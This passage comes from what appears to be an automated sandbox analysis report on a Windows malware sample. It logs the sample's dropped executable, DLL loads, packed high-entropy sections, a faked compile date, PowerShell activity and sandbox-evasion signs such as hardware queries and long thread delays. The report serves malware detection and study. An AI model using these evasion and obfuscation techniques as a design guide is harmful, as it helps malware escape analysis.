                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: uxtheme.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: windows.storage.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: wldp.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: profapi.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: sspicli.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: winhttp.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: webio.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: mswsock.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: iphlpapi.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: winnsi.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: dnsapi.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: rasadhlp.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: fwpuclnt.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: schannel.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: mskeyprotect.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: ntasn1.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: ncrypt.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: ncryptsslp.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: msasn1.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: cryptsp.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: rsaenh.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: cryptbase.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: gpapi.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: dpapi.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: kernel.appcore.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: wbemcomn.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: amsi.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\OiMp3TH.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: OiMp3TH.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: OiMp3TH.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: OiMp3TH.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\Users\Dan\source\repos\pthkkad\pthkkad\obj\Debug\pthkkad.pdb source: OiMp3TH.exe

                Data Obfuscation

                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Unpacked PE file: 7.2.ghhqoznpon_638708802577261661.exe.ea0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
                Source: OiMp3TH.exe Static PE information: 0x8D363D39 [Fri Jan 27 15:01:13 2045 UTC]
                Source: ghhqoznpon_638708802577261661.exe.0.dr Static PE information: section name:
                Source: ghhqoznpon_638708802577261661.exe.0.dr Static PE information: section name:
                Source: ghhqoznpon_638708802577261661.exe.0.dr Static PE information: section name:
                Source: ghhqoznpon_638708802577261661.exe.0.dr Static PE information: section name:
                Source: ghhqoznpon_638708802577261661.exe.0.dr Static PE information: section name:
                Source: C:\Users\user\Desktop\OiMp3TH.exe Code function: 0_2_03086FE0 push es; retf 0_2_03086FB3
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Code function: 7_3_00733408 pushad ; retf 0070h 7_3_00733409
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Code function: 7_3_0076BC90 push esi; iretd 7_3_0076BC91
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Code function: 7_3_03956F24 push esi; retf 7_3_03956F27
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Code function: 7_3_03955E64 push esi; retf 7_3_03955E67
                Source: ghhqoznpon_638708802577261661.exe.0.dr Static PE information: section name: entropy: 7.997894042340675
                Source: ghhqoznpon_638708802577261661.exe.0.dr Static PE information: section name: entropy: 7.8446034009114705
                Source: ghhqoznpon_638708802577261661.exe.0.dr Static PE information: section name: entropy: 7.910323865765355
                Source: ghhqoznpon_638708802577261661.exe.0.dr Static PE information: section name: entropy: 7.889601543930096
                Source: ghhqoznpon_638708802577261661.exe.0.dr Static PE information: section name: .data entropy: 7.987204044077213
                Source: C:\Users\user\Desktop\OiMp3TH.exe File created: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\OiMp3TH.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\OiMp3TH.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\OiMp3TH.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\OiMp3TH.exe Memory allocated: 3080000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\OiMp3TH.exe Memory allocated: 3230000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\OiMp3TH.exe Memory allocated: 5230000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 600000
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 599877
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 599750
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 599631
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 599512
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 599406
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 599221
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 599094
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 598984
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 598875
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 598766
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 598656
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 598547
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 598436
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 598328
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 598219
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 598094
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 597984
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 597875
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 597765
                Source: C:\Users\user\Desktop\OiMp3TH.exe Thread delayed: delay time: 597656
